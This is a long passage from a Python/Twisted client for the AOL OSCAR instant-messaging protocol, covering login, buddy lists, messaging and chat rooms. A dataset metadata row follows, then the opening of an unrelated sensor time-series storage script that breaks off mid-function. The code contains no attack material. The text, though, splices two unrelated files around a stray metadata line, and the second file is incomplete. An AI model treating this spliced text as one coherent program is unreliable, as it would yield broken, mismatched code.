tlvData = TLV(0xc8, reduce(lambda x,y:x+y, [struct.pack('!H',self.usersToID[x]) for x in self.users]))
return struct.pack('!H', len(self.name)) + self.name + \
struct.pack('!HH', groupID, buddyID) + '\000\001' + tlvData
class SSIBuddy:
def __init__(self, name, tlvs = {}):
self.name = name
self.tlvs = tlvs
for k,v in tlvs.items():
if k == 0x013c: # buddy comment
self.buddyComment = v
elif k == 0x013d: # buddy alerts
actionFlag = ord(v[0])
whenFlag = ord(v[1])
self.alertActions = []
self.alertWhen = []
if actionFlag&1:
self.alertActions.append('popup')
if actionFlag&2:
self.alertActions.append('sound')
if whenFlag&1:
self.alertWhen.append('online')
if whenFlag&2:
self.alertWhen.append('unidle')
if whenFlag&4:
self.alertWhen.append('unaway')
elif k == 0x013e:
self.alertSound = v
def oscarRep(self, groupID, buddyID):
tlvData = reduce(lambda x,y: x+y, map(lambda (k,v):TLV(k,v), self.tlvs.items()), '\000\000')
return struct.pack('!H', len(self.name)) + self.name + \
struct.pack('!HH', groupID, buddyID) + '\000\000' + tlvData
class OscarConnection(protocol.Protocol):
def connectionMade(self):
self.state=""
self.seqnum=0
self.buf=''
self.stopKeepAliveID = None
self.setKeepAlive(4*60) # 4 minutes
def connectionLost(self, reason):
log.msg("Connection Lost! %s" % self)
self.stopKeepAlive()
# def connectionFailed(self):
# log.msg("Connection Failed! %s" % self)
# self.stopKeepAlive()
def sendFLAP(self,data,channel = 0x02):
header="!cBHH"
self.seqnum=(self.seqnum+1)%0xFFFF
seqnum=self.seqnum
head=struct.pack(header,'*', channel,
seqnum, len(data))
self.transport.write(head+str(data))
# if isinstance(self, ChatService):
# logPacketData(head+str(data))
def readFlap(self):
header="!cBHH"
if len(self.buf)<6: return
flap=struct.unpack(header,self.buf[:6])
if len(self.buf)<6+flap[3]: return
data,self.buf=self.buf[6:6+flap[3]],self.buf[6+flap[3]:]
return [flap[1],data]
def dataReceived(self,data):
# if isinstance(self, ChatService):
# logPacketData(data)
self.buf=self.buf+data
flap=self.readFlap()
while flap:
func=getattr(self,"oscar_%s"%self.state,None)
if not func:
log.msg("no func for state: %s" % self.state)
state=func(flap)
if state:
self.state=state
flap=self.readFlap()
def setKeepAlive(self,t):
self.keepAliveDelay=t
self.stopKeepAlive()
self.stopKeepAliveID = reactor.callLater(t, self.sendKeepAlive)
def sendKeepAlive(self):
self.sendFLAP("",0x05)
self.stopKeepAliveID = reactor.callLater(self.keepAliveDelay, self.sendKeepAlive)
def stopKeepAlive(self):
if self.stopKeepAliveID:
self.stopKeepAliveID.cancel()
self.stopKeepAliveID = None
def disconnect(self):
"""
send the disconnect flap, and sever the connection
"""
self.sendFLAP('', 0x04)
def f(reason): pass
self.connectionLost = f
self.transport.loseConnection()
class SNACBased(OscarConnection):
snacFamilies = {
# family : (version, toolID, toolVersion)
}
def __init__(self,cookie):
self.cookie=cookie
self.lastID=0
self.supportedFamilies = ()
self.requestCallbacks={} # request id:Deferred
def sendSNAC(self,fam,sub,data,flags=[0,0]):
"""
send a snac and wait for the response by returning a Deferred.
"""
reqid=self.lastID
self.lastID=reqid+1
d = defer.Deferred()
d.reqid = reqid
#d.addErrback(self._ebDeferredError,fam,sub,data) # XXX for testing
self.requestCallbacks[reqid] = d
self.sendFLAP(SNAC(fam,sub,reqid,data))
return d
def _ebDeferredError(self, error, fam, sub, data):
log.msg('ERROR IN DEFERRED %s' % error)
log.msg('on sending of message, family 0x%02x, subtype 0x%02x' % (fam, sub))
log.msg('data: %s' % repr(data))
def sendSNACnr(self,fam,sub,data,flags=[0,0]):
"""
send a snac, but don't bother adding a deferred, we don't care.
"""
self.sendFLAP(SNAC(fam,sub,0x10000*fam+sub,data))
def oscar_(self,data):
self.sendFLAP("\000\000\000\001"+TLV(6,self.cookie), 0x01)
return "Data"
def oscar_Data(self,data):
snac=readSNAC(data[1])
if self.requestCallbacks.has_key(snac[4]):
d = self.requestCallbacks[snac[4]]
del self.requestCallbacks[snac[4]]
if snac[1]!=1:
d.callback(snac)
else:
d.errback(snac)
return
func=getattr(self,'oscar_%02X_%02X'%(snac[0],snac[1]),None)
if not func:
self.oscar_unknown(snac)
else:
func(snac[2:])
return "Data"
def oscar_unknown(self,snac):
log.msg("unknown for %s" % self)
log.msg(snac)
def oscar_01_03(self, snac):
numFamilies = len(snac[3])/2
self.supportedFamilies = struct.unpack("!"+str(numFamilies)+'H', snac[3])
d = ''
for fam in self.supportedFamilies:
if self.snacFamilies.has_key(fam):
d=d+struct.pack('!2H',fam,self.snacFamilies[fam][0])
self.sendSNACnr(0x01,0x17, d)
def oscar_01_0A(self,snac):
"""
change of rate information.
"""
# this can be parsed, maybe we can even work it in
pass
def oscar_01_18(self,snac):
"""
host versions, in the same format as we sent
"""
self.sendSNACnr(0x01,0x06,"") #pass
def clientReady(self):
"""
called when the client is ready to be online
"""
d = ''
for fam in self.supportedFamilies:
if self.snacFamilies.has_key(fam):
version, toolID, toolVersion = self.snacFamilies[fam]
d = d + struct.pack('!4H',fam,version,toolID,toolVersion)
self.sendSNACnr(0x01,0x02,d)
class BOSConnection(SNACBased):
snacFamilies = {
0x01:(3, 0x0110, 0x059b),
0x13:(3, 0x0110, 0x059b),
0x02:(1, 0x0110, 0x059b),
0x03:(1, 0x0110, 0x059b),
0x04:(1, 0x0110, 0x059b),
0x06:(1, 0x0110, 0x059b),
0x08:(1, 0x0104, 0x0001),
0x09:(1, 0x0110, 0x059b),
0x0a:(1, 0x0110, 0x059b),
0x0b:(1, 0x0104, 0x0001),
0x0c:(1, 0x0104, 0x0001)
}
capabilities = None
def __init__(self,username,cookie):
SNACBased.__init__(self,cookie)
self.username=username
self.profile = None
self.awayMessage = None
self.services = {}
if not self.capabilities:
self.capabilities = [CAP_CHAT]
def parseUser(self,data,count=None):
l=ord(data[0])
name=data[1:1+l]
warn,foo=struct.unpack("!HH",data[1+l:5+l])
warn=int(warn/10)
tlvs=data[5+l:]
if count:
tlvs,rest = readTLVs(tlvs,foo)
else:
tlvs,rest = readTLVs(tlvs), None
u = OSCARUser(name, warn, tlvs)
if rest == None:
return u
else:
return u, rest
def oscar_01_05(self, snac, d = None):
"""
data for a new service connection
d might be a deferred to be called back when the service is ready
"""
tlvs = readTLVs(snac[3][2:])
service = struct.unpack('!H',tlvs[0x0d])[0]
ip = tlvs[5]
cookie = tlvs[6]
#c = serviceClasses[service](self, cookie, d)
c = protocol.ClientCreator(reactor, serviceClasses[service], self, cookie, d)
def addService(x):
self.services[service] = x
c.connectTCP(ip, 5190).addCallback(addService)
#self.services[service] = c
def oscar_01_07(self,snac):
"""
rate paramaters
"""
self.sendSNACnr(0x01,0x08,"\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05") # ack
self.initDone()
self.sendSNACnr(0x13,0x02,'') # SSI rights info
self.sendSNACnr(0x02,0x02,'') # location rights info
self.sendSNACnr(0x03,0x02,'') # buddy list rights
self.sendSNACnr(0x04,0x04,'') # ICBM parms
self.sendSNACnr(0x09,0x02,'') # BOS rights
def oscar_01_10(self,snac):
"""
we've been warned
"""
skip = struct.unpack('!H',snac[3][:2])[0]
newLevel = struct.unpack('!H',snac[3][2+skip:4+skip])[0]/10
if len(snac[3])>4+skip:
by = self.parseUser(snac[3][4+skip:])
else:
by = None
self.receiveWarning(newLevel, by)
def oscar_01_13(self,snac):
"""
MOTD
"""
pass # we don't care for now
def oscar_02_03(self, snac):
"""
location rights response
"""
tlvs = readTLVs(snac[3])
self.maxProfileLength = tlvs[1]
def oscar_03_03(self, snac):
"""
buddy list rights response
"""
tlvs = readTLVs(snac[3])
self.maxBuddies = tlvs[1]
self.maxWatchers = tlvs[2]
def oscar_03_0B(self, snac):
"""
buddy update
"""
self.updateBuddy(self.parseUser(snac[3]))
def oscar_03_0C(self, snac):
"""
buddy offline
"""
self.offlineBuddy(self.parseUser(snac[3]))
# def oscar_04_03(self, snac):
def oscar_04_05(self, snac):
"""
ICBM parms response
"""
self.sendSNACnr(0x04,0x02,'\x00\x00\x00\x00\x00\x0b\x1f@\x03\xe7\x03\xe7\x00\x00\x00\x00') # IM rights
def oscar_04_07(self, snac):
"""
ICBM message (instant message)
"""
data = snac[3]
cookie, data = data[:8], data[8:]
channel = struct.unpack('!H',data[:2])[0]
data = data[2:]
user, data = self.parseUser(data, 1)
tlvs = readTLVs(data)
if channel == 1: # message
flags = []
multiparts = []
for k, v in tlvs.items():
if k == 2:
while v:
v = v[2:] # skip bad data
messageLength, charSet, charSubSet = struct.unpack('!3H', v[:6])
messageLength -= 4
message = [v[6:6+messageLength]]
if charSet == 0:
pass # don't add anything special
elif charSet == 2:
message.append('unicode')
elif charSet == 3:
message.append('iso-8859-1')
elif charSet == 0xffff:
message.append('none')
if charSubSet == 0xb:
message.append('macintosh')
if messageLength > 0: multiparts.append(tuple(message))
v = v[6+messageLength:]
elif k == 3:
flags.append('acknowledge')
elif k == 4:
flags.append('auto')
elif k == 6:
flags.append('offline')
elif k == 8:
iconLength, foo, iconSum, iconStamp = struct.unpack('!LHHL',v)
if iconLength:
flags.append('icon')
flags.append((iconLength, iconSum, iconStamp))
elif k == 9:
flags.append('buddyrequest')
elif k == 0xb: # unknown
pass
elif k == 0x17:
flags.append('extradata')
flags.append(v)
else:
log.msg('unknown TLV for incoming IM, %04x, %s' % (k,repr(v)))
# unknown tlv for user SNewdorf
# t: 29
# v: '\x00\x00\x00\x05\x02\x01\xd2\x04r\x00\x01\x01\x10/\x8c\x8b\x8a\x1e\x94*\xbc\x80}\x8d\xc4;\x1dEM'
# XXX what is this?
self.receiveMessage(user, multiparts, flags)
elif channel == 2: # rondevouz
status = struct.unpack('!H',tlvs[5][:2])[0]
requestClass = tlvs[5][10:26]
moreTLVs = readTLVs(tlvs[5][26:])
if requestClass == CAP_CHAT: # a chat request
exchange = struct.unpack('!H',moreTLVs[10001][:2])[0]
name = moreTLVs[10001][3:-2]
instance = struct.unpack('!H',moreTLVs[10001][-2:])[0]
if not self.services.has_key(SERVICE_CHATNAV):
self.connectService(SERVICE_CHATNAV,1).addCallback(lambda x: self.services[SERVICE_CHATNAV].getChatInfo(exchange, name, instance).\
addCallback(self._cbGetChatInfoForInvite, user, moreTLVs[12]))
else:
self.services[SERVICE_CHATNAV].getChatInfo(exchange, name, instance).\
addCallback(self._cbGetChatInfoForInvite, user, moreTLVs[12])
elif requestClass == CAP_SEND_FILE:
if moreTLVs.has_key(11): # cancel
log.msg('cancelled file request')
log.msg(status)
return # handle this later
name = moreTLVs[10001][9:-7]
desc = moreTLVs[12]
log.msg('file request from %s, %s, %s' % (user, name, desc))
self.receiveSendFileRequest(user, name, desc, cookie)
else:
log.msg('unsupported rondevouz: %s' % requestClass)
log.msg(repr(moreTLVs))
else:
log.msg('unknown channel %02x' % channel)
log.msg(tlvs)
def _cbGetChatInfoForInvite(self, info, user, message):
apply(self.receiveChatInvite, (user,message)+info)
def oscar_09_03(self, snac):
"""
BOS rights response
"""
tlvs = readTLVs(snac[3])
self.maxPermitList = tlvs[1]
self.maxDenyList = tlvs[2]
def oscar_0B_02(self, snac):
"""
stats reporting interval
"""
self.reportingInterval = struct.unpack('!H',snac[3][:2])[0]
def oscar_13_03(self, snac):
"""
SSI rights response
"""
#tlvs = readTLVs(snac[3])
pass # we don't know how to parse this
# methods to be called by the client, and their support methods
def requestSelfInfo(self):
"""
ask for the OSCARUser for ourselves
"""
d = defer.Deferred()
self.sendSNAC(0x01, 0x0E, '').addCallback(self._cbRequestSelfInfo, d)
return d
def _cbRequestSelfInfo(self, snac, d):
d.callback(self.parseUser(snac[5]))
def initSSI(self):
"""
this sends the rate request for family 0x13 (Server Side Information)
so we can then use it
"""
return self.sendSNAC(0x13, 0x02, '').addCallback(self._cbInitSSI)
def _cbInitSSI(self, snac, d):
return {} # don't even bother parsing this
def requestSSI(self, timestamp = 0, revision = 0):
"""
request the server side information
if the deferred gets None, it means the SSI is the same
"""
return self.sendSNAC(0x13, 0x05,
struct.pack('!LH',timestamp,revision)).addCallback(self._cbRequestSSI)
def _cbRequestSSI(self, snac, args = ()):
if snac[1] == 0x0f: # same SSI as we have
return
itemdata = snac[5][3:]
if args:
revision, groups, permit, deny, permitMode, visibility = args
else:
version, revision = struct.unpack('!BH', snac[5][:3])
groups = {}
permit = []
deny = []
permitMode = None
visibility = None
while len(itemdata)>4:
nameLength = struct.unpack('!H', itemdata[:2])[0]
name = itemdata[2:2+nameLength]
groupID, buddyID, itemType, restLength = \
struct.unpack('!4H', itemdata[2+nameLength:10+nameLength])
tlvs = readTLVs(itemdata[10+nameLength:10+nameLength+restLength])
itemdata = itemdata[10+nameLength+restLength:]
if itemType == 0: # buddies
groups[groupID].addUser(buddyID, SSIBuddy(name, tlvs))
elif itemType == 1: # group
g = SSIGroup(name, tlvs)
if groups.has_key(0): groups[0].addUser(groupID, g)
groups[groupID] = g
elif itemType == 2: # permit
permit.append(name)
elif itemType == 3: # deny
deny.append(name)
elif itemType == 4: # permit deny info
if not tlvs.has_key(0xcb):
continue # this happens with ICQ
permitMode = {1:'permitall',2:'denyall',3:'permitsome',4:'denysome',5:'permitbuddies'}[ord(tlvs[0xca])]
visibility = {'\xff\xff\xff\xff':'all','\x00\x00\x00\x04':'notaim'}[tlvs[0xcb]]
elif itemType == 5: # unknown (perhaps idle data)?
pass
else:
log.msg('%s %s %s %s %s' % (name, groupID, buddyID, itemType, tlvs))
timestamp = struct.unpack('!L',itemdata)[0]
if not timestamp: # we've got more packets coming
# which means add some deferred stuff
d = defer.Deferred()
self.requestCallbacks[snac[4]] = d
d.addCallback(self._cbRequestSSI, (revision, groups, permit, deny, permitMode, visibility))
return d
return (groups[0].users,permit,deny,permitMode,visibility,timestamp,revision)
def activateSSI(self):
"""
active the data stored on the server (use buddy list, permit deny settings, etc.)
"""
self.sendSNACnr(0x13,0x07,'')
def startModifySSI(self):
"""
tell the OSCAR server to be on the lookout for SSI modifications
"""
self.sendSNACnr(0x13,0x11,'')
def addItemSSI(self, item, groupID = None, buddyID = None):
"""
add an item to the SSI server. if buddyID == 0, then this should be a group.
this gets a callback when it's finished, but you can probably ignore it.
"""
if groupID is None:
if isinstance(item, SSIGroup):
groupID = 0
else:
groupID = item.group.group.findIDFor(item.group)
if buddyID is None:
buddyID = item.group.findIDFor(item)
return self.sendSNAC(0x13,0x08, item.oscarRep(groupID, buddyID))
def modifyItemSSI(self, item, groupID = None, buddyID = None):
if groupID is None:
if isinstance(item, SSIGroup):
groupID = 0
else:
groupID = item.group.group.findIDFor(item.group)
if buddyID is None:
buddyID = item.group.findIDFor(item)
return self.sendSNAC(0x13,0x09, item.oscarRep(groupID, buddyID))
def delItemSSI(self, item, groupID = None, buddyID = None):
if groupID is None:
if isinstance(item, SSIGroup):
groupID = 0
else:
groupID = item.group.group.findIDFor(item.group)
if buddyID is None:
buddyID = item.group.findIDFor(item)
return self.sendSNAC(0x13,0x0A, item.oscarRep(groupID, buddyID))
def endModifySSI(self):
self.sendSNACnr(0x13,0x12,'')
def setProfile(self, profile):
"""
set the profile.
send None to not set a profile (different from '' for a blank one)
"""
self.profile = profile
tlvs = ''
if self.profile is not None:
tlvs = TLV(1,'text/aolrtf; charset="us-ascii"') + \
TLV(2,self.profile)
tlvs = tlvs + TLV(5, ''.join(self.capabilities))
self.sendSNACnr(0x02, 0x04, tlvs)
def setAway(self, away = None):
"""
set the away message, or return (if away == None)
"""
self.awayMessage = away
tlvs = TLV(3,'text/aolrtf; charset="us-ascii"') + \
TLV(4,away or '')
self.sendSNACnr(0x02, 0x04, tlvs)
def setIdleTime(self, idleTime):
"""
set our idle time. don't call more than once with a non-0 idle time.
"""
self.sendSNACnr(0x01, 0x11, struct.pack('!L',idleTime))
def sendMessage(self, user, message, wantAck = 0, autoResponse = 0, offline = 0 ): \
#haveIcon = 0, ):
"""
send a message to user (not an OSCARUseR).
message can be a string, or a multipart tuple.
if wantAck, we return a Deferred that gets a callback when the message is sent.
if autoResponse, this message is an autoResponse, as if from an away message.
if offline, this is an offline message (ICQ only, I think)
"""
data = ''.join([chr(random.randrange(0, 127)) for i in range(8)]) # cookie
data = data + '\x00\x01' + chr(len(user)) + user
if not type(message) in (types.TupleType, types.ListType):
message = [[message,]]
if type(message[0][0]) == types.UnicodeType:
message[0].append('unicode')
messageData = ''
for part in message:
charSet = 0
if 'unicode' in part[1:]:
charSet = 2
part[0] = part[0].encode('utf-8')
elif 'iso-8859-1' in part[1:]:
charSet = 3
part[0] = part[0].encode('iso-8859-1')
elif 'none' in part[1:]:
charSet = 0xffff
if 'macintosh' in part[1:]:
charSubSet = 0xb
else:
charSubSet = 0
messageData = messageData + '\x01\x01' + \
struct.pack('!3H',len(part[0])+4,charSet,charSubSet)
messageData = messageData + part[0]
data = data + TLV(2, '\x05\x01\x00\x03\x01\x01\x02'+messageData)
if wantAck:
data = data + TLV(3,'')
if autoResponse:
data = data + TLV(4,'')
if offline:
data = data + TLV(6,'')
if wantAck:
return self.sendSNAC(0x04, 0x06, data).addCallback(self._cbSendMessageAck, user, message)
self.sendSNACnr(0x04, 0x06, data)
def _cbSendMessageAck(self, snac, user, message):
return user, message
def connectService(self, service, wantCallback = 0, extraData = ''):
"""
connect to another service
if wantCallback, we return a Deferred that gets called back when the service is online.
if extraData, append that to our request.
"""
if wantCallback:
d = defer.Deferred()
self.sendSNAC(0x01,0x04,struct.pack('!H',service) + extraData).addCallback(self._cbConnectService, d)
return d
else:
self.sendSNACnr(0x01,0x04,struct.pack('!H',service))
def _cbConnectService(self, snac, d):
self.oscar_01_05(snac[2:], d)
def createChat(self, shortName):
"""
create a chat room
"""
if self.services.has_key(SERVICE_CHATNAV):
return self.services[SERVICE_CHATNAV].createChat(shortName)
else:
return self.connectService(SERVICE_CHATNAV,1).addCallback(lambda s: s.createChat(shortName))
def joinChat(self, exchange, fullName, instance):
"""
join a chat room
"""
#d = defer.Deferred()
return self.connectService(0x0e, 1, TLV(0x01, struct.pack('!HB',exchange, len(fullName)) + fullName +
struct.pack('!H', instance))).addCallback(self._cbJoinChat) #, d)
#return d
def _cbJoinChat(self, chat):
del self.services[SERVICE_CHAT]
return chat
def warnUser(self, user, anon = 0):
return self.sendSNAC(0x04, 0x08, '\x00'+chr(anon)+chr(len(user))+user).addCallback(self._cbWarnUser)
def _cbWarnUser(self, snac):
oldLevel, newLevel = struct.unpack('!2H', snac[5])
return oldLevel, newLevel
def getInfo(self, user):
#if user.
return self.sendSNAC(0x02, 0x05, '\x00\x01'+chr(len(user))+user).addCallback(self._cbGetInfo)
def _cbGetInfo(self, snac):
user, rest = self.parseUser(snac[5],1)
tlvs = readTLVs(rest)
return tlvs.get(0x02,None)
def getAway(self, user):
return self.sendSNAC(0x02, 0x05, '\x00\x03'+chr(len(user))+user).addCallback(self._cbGetAway)
def _cbGetAway(self, snac):
user, rest = self.parseUser(snac[5],1)
tlvs = readTLVs(rest)
return tlvs.get(0x04,None) # return None if there is no away message
#def acceptSendFileRequest(self,
# methods to be overriden by the client
def initDone(self):
"""
called when we get the rate information, which means we should do other init. stuff.
"""
log.msg('%s initDone' % self)
pass
def updateBuddy(self, user):
"""
called when a buddy changes status, with the OSCARUser for that buddy.
"""
log.msg('%s updateBuddy %s' % (self, user))
pass
def offlineBuddy(self, user):
"""
called when a buddy goes offline
"""
log.msg('%s offlineBuddy %s' % (self, user))
pass
def receiveMessage(self, user, multiparts, flags):
"""
called when someone sends us a message
"""
pass
def receiveWarning(self, newLevel, user):
"""
called when someone warns us.
user is either None (if it was anonymous) or an OSCARUser
"""
pass
def receiveChatInvite(self, user, message, exchange, fullName, instance, shortName, inviteTime):
"""
called when someone invites us to a chat room
"""
pass
def chatReceiveMessage(self, chat, user, message):
"""
called when someone in a chatroom sends us a message in the chat
"""
pass
def chatMemberJoined(self, chat, member):
"""
called when a member joins the chat
"""
pass
def chatMemberLeft(self, chat, member):
"""
called when a member leaves the chat
"""
pass
def receiveSendFileRequest(self, user, file, description, cookie):
"""
called when someone tries to send a file to us
"""
pass
class OSCARService(SNACBased):
def __init__(self, bos, cookie, d = None):
SNACBased.__init__(self, cookie)
self.bos = bos
self.d = d
def connectionLost(self, reason):
for k,v in self.bos.services.items():
if v == self:
del self.bos.services[k]
return
def clientReady(self):
SNACBased.clientReady(self)
if self.d:
self.d.callback(self)
self.d = None
class ChatNavService(OSCARService):
snacFamilies = {
0x01:(3, 0x0010, 0x059b),
0x0d:(1, 0x0010, 0x059b)
}
def oscar_01_07(self, snac):
# rate info
self.sendSNACnr(0x01, 0x08, '\000\001\000\002\000\003\000\004\000\005')
self.sendSNACnr(0x0d, 0x02, '')
def oscar_0D_09(self, snac):
self.clientReady()
def getChatInfo(self, exchange, name, instance):
d = defer.Deferred()
self.sendSNAC(0x0d,0x04,struct.pack('!HB',exchange,len(name)) + \
name + struct.pack('!HB',instance,2)). \
addCallback(self._cbGetChatInfo, d)
return d
def _cbGetChatInfo(self, snac, d):
data = snac[5][4:]
exchange, length = struct.unpack('!HB',data[:3])
fullName = data[3:3+length]
instance = struct.unpack('!H',data[3+length:5+length])[0]
tlvs = readTLVs(data[8+length:])
shortName = tlvs[0x6a]
inviteTime = struct.unpack('!L',tlvs[0xca])[0]
info = (exchange,fullName,instance,shortName,inviteTime)
d.callback(info)
def createChat(self, shortName):
#d = defer.Deferred()
data = '\x00\x04\x06create\xff\xff\x01\x00\x03'
data = data + TLV(0xd7, 'en')
data = data + TLV(0xd6, 'us-ascii')
data = data + TLV(0xd3, shortName)
return self.sendSNAC(0x0d, 0x08, data).addCallback(self._cbCreateChat)
#return d
def _cbCreateChat(self, snac): #d):
exchange, length = struct.unpack('!HB',snac[5][4:7])
fullName = snac[5][7:7+length]
instance = struct.unpack('!H',snac[5][7+length:9+length])[0]
#d.callback((exchange, fullName, instance))
return exchange, fullName, instance
class ChatService(OSCARService):
snacFamilies = {
0x01:(3, 0x0010, 0x059b),
0x0E:(1, 0x0010, 0x059b)
}
def __init__(self,bos,cookie, d = None):
OSCARService.__init__(self,bos,cookie,d)
self.exchange = None
self.fullName = None
self.instance = None
self.name = None
self.members = None
clientReady = SNACBased.clientReady # we'll do our own callback
def oscar_01_07(self,snac):
self.sendSNAC(0x01,0x08,"\000\001\000\002\000\003\000\004\000\005")
self.clientReady()
def oscar_0E_02(self, snac):
# try: # this is EVIL
# data = snac[3][4:]
# self.exchange, length = struct.unpack('!HB',data[:3])
# self.fullName = data[3:3+length]
# self.instance = struct.unpack('!H',data[3+length:5+length])[0]
# tlvs = readTLVs(data[8+length:])
# self.name = tlvs[0xd3]
# self.d.callback(self)
# except KeyError:
data = snac[3]
self.exchange, length = struct.unpack('!HB',data[:3])
self.fullName = data[3:3+length]
self.instance = struct.unpack('!H',data[3+length:5+length])[0]
tlvs = readTLVs(data[8+length:])
self.name = tlvs[0xd3]
self.d.callback(self)
def oscar_0E_03(self,snac):
users=[]
rest=snac[3]
while rest:
user, rest = self.bos.parseUser(rest, 1)
users.append(user)
if not self.fullName:
self.members = users
else:
self.members.append(users[0])
self.bos.chatMemberJoined(self,users[0])
def oscar_0E_04(self,snac):
user=self.bos.parseUser(snac[3])
for u in self.members:
if u.name == user.name: # same person!
self.members.remove(u)
self.bos.chatMemberLeft(self,user)
def oscar_0E_06(self,snac):
data = snac[3]
user,rest=self.bos.parseUser(snac[3][14:],1)
tlvs = readTLVs(rest[8:])
message=tlvs[1]
self.bos.chatReceiveMessage(self,user,message)
def sendMessage(self,message):
tlvs=TLV(0x02,"us-ascii")+TLV(0x03,"en")+TLV(0x01,message)
self.sendSNAC(0x0e,0x05,
"\x46\x30\x38\x30\x44\x00\x63\x00\x00\x03\x00\x01\x00\x00\x00\x06\x00\x00\x00\x05"+
struct.pack("!H",len(tlvs))+
tlvs)
def leaveChat(self):
self.disconnect()
class OscarAuthenticator(OscarConnection):
BOSClass = BOSConnection
def __init__(self,username,password,deferred=None,icq=0):
self.username=username
self.password=password
self.deferred=deferred
self.icq=icq # icq mode is disabled
#if icq and self.BOSClass==BOSConnection:
# self.BOSClass=ICQConnection
def oscar_(self,flap):
if not self.icq:
self.sendFLAP("\000\000\000\001", 0x01)
self.sendFLAP(SNAC(0x17,0x06,0,
TLV(TLV_USERNAME,self.username)+
TLV(0x004B,'')))
self.state="Key"
else:
encpass=encryptPasswordICQ(self.password)
self.sendFLAP('\000\000\000\001'+
TLV(0x01,self.username)+
TLV(0x02,encpass)+
TLV(0x03,'ICQ Inc. - Product of ICQ (TM).2001b.5.18.1.3659.85')+
TLV(0x16,"\x01\x0a")+
TLV(0x17,"\x00\x05")+
TLV(0x18,"\x00\x12")+
TLV(0x19,"\000\001")+
TLV(0x1a,"\x0eK")+
TLV(0x14,"\x00\x00\x00U")+
TLV(0x0f,"en")+
TLV(0x0e,"us"),0x01)
self.state="Cookie"
def oscar_Key(self,data):
snac=readSNAC(data[1])
key=snac[5][2:]
encpass=encryptPasswordMD5(self.password,key)
self.sendFLAP(SNAC(0x17,0x02,0,
TLV(TLV_USERNAME,self.username)+
TLV(TLV_PASSWORD,encpass)+
TLV(0x004C, '')+ # unknown
TLV(TLV_CLIENTNAME,"AOL Instant Messenger (SM), version 4.8.2790/WIN32")+
TLV(0x0016,"\x01\x09")+
TLV(TLV_CLIENTMAJOR,"\000\004")+
TLV(TLV_CLIENTMINOR,"\000\010")+
TLV(0x0019,"\000\000")+
TLV(TLV_CLIENTSUB,"\x0A\xE6")+
TLV(0x0014,"\x00\x00\x00\xBB")+
TLV(TLV_LANG,"en")+
TLV(TLV_COUNTRY,"us")+
TLV(TLV_USESSI,"\001")))
return "Cookie"
def oscar_Cookie(self,data):
snac=readSNAC(data[1])
if self.icq:
i=snac[5].find("\000")
snac[5]=snac[5][i:]
tlvs=readTLVs(snac[5])
if tlvs.has_key(6):
self.cookie=tlvs[6]
server,port=string.split(tlvs[5],":")
d = self.connectToBOS(server, int(port))
d.addErrback(lambda x: log.msg("Connection Failed! Reason: %s" % x))
if self.deferred:
d.chainDeferred(self.deferred)
self.disconnect()
elif tlvs.has_key(8):
errorcode=tlvs[8]
errorurl=tlvs[4]
if errorcode=='\000\030':
error="You are attempting to sign on again too soon. Please try again later."
elif errorcode=='\000\005':
error="Invalid Username or Password."
else: error=repr(errorcode)
self.error(error,errorurl)
else:
log.msg('hmm, weird tlvs for %s cookie packet' % str(self))
log.msg(tlvs)
log.msg('snac')
log.msg(str(snac))
return "None"
def oscar_None(self,data): pass
def connectToBOS(self, server, port):
c = protocol.ClientCreator(reactor, self.BOSClass, self.username, self.cookie)
return c.connectTCP(server, int(port))
def error(self,error,url):
log.msg("ERROR! %s %s" % (error,url))
if self.deferred: self.deferred.errback((error,url))
self.transport.loseConnection()
FLAP_CHANNEL_NEW_CONNECTION = 0x01
FLAP_CHANNEL_DATA = 0x02
FLAP_CHANNEL_ERROR = 0x03
FLAP_CHANNEL_CLOSE_CONNECTION = 0x04
SERVICE_CHATNAV = 0x0d
SERVICE_CHAT = 0x0e
serviceClasses = {
SERVICE_CHATNAV:ChatNavService,
SERVICE_CHAT:ChatService
}
TLV_USERNAME = 0x0001
TLV_CLIENTNAME = 0x0003
TLV_COUNTRY = 0x000E
TLV_LANG = 0x000F
TLV_CLIENTMAJOR = 0x0017
TLV_CLIENTMINOR = 0x0018
TLV_CLIENTSUB = 0x001A
TLV_PASSWORD = 0x0025
TLV_USESSI = 0x004A
CAP_ICON = '\011F\023FL\177\021\321\202"DEST\000\000'
CAP_VOICE = '\011F\023AL\177\021\321\202"DEST\000\000'
CAP_IMAGE = '\011F\023EL\177\021\321\202"DEST\000\000'
CAP_CHAT = 't\217$ b\207\021\321\202"DEST\000\000'
CAP_GET_FILE = '\011F\023HL\177\021\321\202"DEST\000\000'
CAP_SEND_FILE = '\011F\023CL\177\021\321\202"DEST\000\000'
CAP_GAMES = '\011F\023GL\177\021\321\202"DEST\000\000'
CAP_SEND_LIST = '\011F\023KL\177\021\321\202"DEST\000\000'
CAP_SERV_REL = '\011F\023IL\177\021\321\202"DEST\000\000'
| apache-2.0 | 8,640,750,613,813,544,000 | 34.025101 | 151 | 0.53648 | false | 3.380696 | false | false | false |
EnergyID/opengrid | library/storetimeseriesdata.py | 1 | 3097 | # -*- coding: utf-8 -*-
"""
Created by Filip Jorissen
This function stores sensor measurement data. For each sensor two files are created. Sensor.meta contains metadata about the measurements. Sensor.txt contains the actual measurements: only the measurements. The location of the measurement in the file indicates the time at which it was measured. If an existing measurement is already stored, data is appended and overwritten.
TODO: add conditions to check for illegal operations: too long file, ...
"""
import os, io
import json
def storeTimeSeriesData(data, sensor, token, unit):
resultpath="results"
metapath=resultpath +"/"+ sensor + ".meta"
datapath=resultpath +"/"+ sensor + ".txt"
datalength=6
#create results folder if it does not exist
if not os.path.exists(resultpath):
os.makedirs(resultpath)
if os.path.exists(metapath):
# load existing meta file
with open(metapath, 'rb') as fp:
metadata = json.load(fp)
# set write mode to read and overwrite
mode = 'r+b'
#check for inconsistencies
if metadata['sensor'] != sensor or metadata['token'] != token or metadata['unit'] != unit or metadata['datalength'] != datalength:
raise ValueError('Argument is inconsistent with its stored value')
if (data[0][0]- metadata['starttime']) % 60 != 0:
print("Timestamp does not have the correct spacing compared to the initial timestamp! Storage cancelled.")
return
else:
#create new meta file
metadata=dict()
metadata['starttime']=data[0][0]
metadata['sensor']=sensor
metadata['token']=token
metadata['unit']=unit
metadata['resolution']='minute' #need to edit factors '60' below when this is changed!
metadata['datalength']=datalength
metadata['separator']=' '
metadata['edittimes']=[]
# set write mode to write
mode='wb'
#append the unix timestamp to indicate which values were overwritten/added
metadata['edittimes'].append(data[0][0])
#raise an exception when data measurements happened before the currently first measurement of the file
if data[0][0]<metadata['starttime']:
raise ValueError('The added data cannot be appended before the start of the file')
